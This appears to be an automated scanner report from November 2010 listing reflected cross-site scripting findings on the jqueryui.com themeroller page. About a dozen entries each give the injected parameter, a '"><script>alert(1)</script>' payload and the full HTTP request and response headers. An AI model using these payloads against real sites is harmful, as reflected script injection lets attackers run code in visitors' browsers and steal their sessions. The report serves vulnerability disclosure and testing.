Content-Length: 120130
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f060"><script>alert(1)</script>f4d625fbe8f was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=05f060"><script>alert(1)</script>f4d625fbe8f&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7ccc"><script>alert(1)</script>1d5996565c3 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0f7ccc"><script>alert(1)</script>1d5996565c3&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420d7"><script>alert(1)</script>43bc00d2166 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png420d7"><script>alert(1)</script>43bc00d2166&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd29c"><script>alert(1)</script>6b56a51ca68 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.pngfd29c"><script>alert(1)</script>6b56a51ca68&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88bc"><script>alert(1)</script>371ad7ef019 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.pnga88bc"><script>alert(1)</script>371ad7ef019&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80133"><script>alert(1)</script>785ff6f694b was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png80133"><script>alert(1)</script>785ff6f694b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbe4"><script>alert(1)</script>0b3844709c3 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png6cbe4"><script>alert(1)</script>0b3844709c3&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1deb"><script>alert(1)</script>8320d1e8237 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngc1deb"><script>alert(1)</script>8320d1e8237&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91f47"><script>alert(1)</script>86f6ab1337a was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png91f47"><script>alert(1)</script>86f6ab1337a&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4c61"><script>alert(1)</script>2558bcf702b was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pngf4c61"><script>alert(1)</script>2558bcf702b&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1ed"><script>alert(1)</script>af92b1064b8 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngfa1ed"><script>alert(1)</script>af92b1064b8&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64a53"><script>alert(1)</script>2590027d388 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e64a53"><script>alert(1)</script>2590027d388&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31e5e"><script>alert(1)</script>15d613d40d8 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc31e5e"><script>alert(1)</script>15d613d40d8&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
